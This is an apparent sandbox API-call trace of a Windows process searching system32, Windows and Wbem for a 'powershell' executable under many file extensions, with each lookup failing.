	[0359.437] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.445] SetErrorMode (uMode=0x1) returned 0x1
	[0359.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0359.447] SetErrorMode (uMode=0x1) returned 0x1
	[0359.447] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.447] SetErrorMode (uMode=0x1) returned 0x1
	[0359.447] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0359.447] SetErrorMode (uMode=0x1) returned 0x1
	[0359.448] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.448] SetErrorMode (uMode=0x1) returned 0x1
	[0359.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0359.448] SetErrorMode (uMode=0x1) returned 0x1
	[0359.448] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.448] SetErrorMode (uMode=0x1) returned 0x1
	[0359.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0359.449] SetErrorMode (uMode=0x1) returned 0x1
	[0359.449] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.449] SetErrorMode (uMode=0x1) returned 0x1
	[0359.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0359.449] SetErrorMode (uMode=0x1) returned 0x1
	[0359.449] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.450] SetErrorMode (uMode=0x1) returned 0x1
	[0359.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0359.450] SetErrorMode (uMode=0x1) returned 0x1
	[0359.450] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.450] SetErrorMode (uMode=0x1) returned 0x1
	[0359.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0359.450] SetErrorMode (uMode=0x1) returned 0x1
	[0359.451] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.451] SetErrorMode (uMode=0x1) returned 0x1
	[0359.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0359.451] SetErrorMode (uMode=0x1) returned 0x1
	[0359.451] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.451] SetErrorMode (uMode=0x1) returned 0x1
	[0359.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0359.452] SetErrorMode (uMode=0x1) returned 0x1
	[0359.452] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.452] SetErrorMode (uMode=0x1) returned 0x1
	[0359.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0359.452] SetErrorMode (uMode=0x1) returned 0x1
	[0359.452] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.453] SetErrorMode (uMode=0x1) returned 0x1
	[0359.453] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0359.453] SetErrorMode (uMode=0x1) returned 0x1
	[0359.453] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.453] SetErrorMode (uMode=0x1) returned 0x1
	[0359.453] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0359.453] SetErrorMode (uMode=0x1) returned 0x1
	[0359.454] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.454] SetErrorMode (uMode=0x1) returned 0x1
	[0359.454] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0359.454] SetErrorMode (uMode=0x1) returned 0x1
	[0359.454] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.454] SetErrorMode (uMode=0x1) returned 0x1
	[0359.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0359.455] SetErrorMode (uMode=0x1) returned 0x1
	[0359.455] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.455] SetErrorMode (uMode=0x1) returned 0x1
	[0359.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0359.455] SetErrorMode (uMode=0x1) returned 0x1
	[0359.455] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.456] SetErrorMode (uMode=0x1) returned 0x1
	[0359.456] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0359.456] SetErrorMode (uMode=0x1) returned 0x1
	[0359.456] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.456] SetErrorMode (uMode=0x1) returned 0x1
	[0359.456] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0359.457] SetErrorMode (uMode=0x1) returned 0x1
	[0359.457] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.457] SetErrorMode (uMode=0x1) returned 0x1
	[0359.457] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0359.457] SetErrorMode (uMode=0x1) returned 0x1
	[0359.457] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.457] SetErrorMode (uMode=0x1) returned 0x1
	[0359.458] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0359.458] SetErrorMode (uMode=0x1) returned 0x1
	[0359.458] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.458] SetErrorMode (uMode=0x1) returned 0x1
	[0359.458] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0359.458] SetErrorMode (uMode=0x1) returned 0x1
	[0359.458] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.459] SetErrorMode (uMode=0x1) returned 0x1
	[0359.459] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0359.459] SetErrorMode (uMode=0x1) returned 0x1
	[0359.459] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.459] SetErrorMode (uMode=0x1) returned 0x1
	[0359.459] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0359.460] SetErrorMode (uMode=0x1) returned 0x1
	[0359.460] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.460] SetErrorMode (uMode=0x1) returned 0x1
	[0359.476] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0359.476] SetErrorMode (uMode=0x1) returned 0x1
	[0359.477] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.477] SetErrorMode (uMode=0x1) returned 0x1
	[0359.477] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0359.477] SetErrorMode (uMode=0x1) returned 0x1
	[0359.477] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.477] SetErrorMode (uMode=0x1) returned 0x1
	[0359.478] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0359.478] SetErrorMode (uMode=0x1) returned 0x1
	[0359.478] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.478] SetErrorMode (uMode=0x1) returned 0x1
	[0359.478] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0359.478] SetErrorMode (uMode=0x1) returned 0x1
	[0359.479] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.479] SetErrorMode (uMode=0x1) returned 0x1
	[0359.479] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0359.479] SetErrorMode (uMode=0x1) returned 0x1
	[0359.479] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.479] SetErrorMode (uMode=0x1) returned 0x1
	[0359.480] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0359.480] SetErrorMode (uMode=0x1) returned 0x1
	[0359.480] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.480] SetErrorMode (uMode=0x1) returned 0x1
	[0359.480] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0359.480] SetErrorMode (uMode=0x1) returned 0x1
	[0359.480] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.481] SetErrorMode (uMode=0x1) returned 0x1
	[0359.481] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0359.481] SetErrorMode (uMode=0x1) returned 0x1
	[0359.481] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c80dc40 | out: lpFindFileData=0x1c80dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0359.481] SetErrorMode (uMode=0x1) returned 0x1
	[0359.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0359.482] SetErrorMode (uMode=0x1) returned 0x1
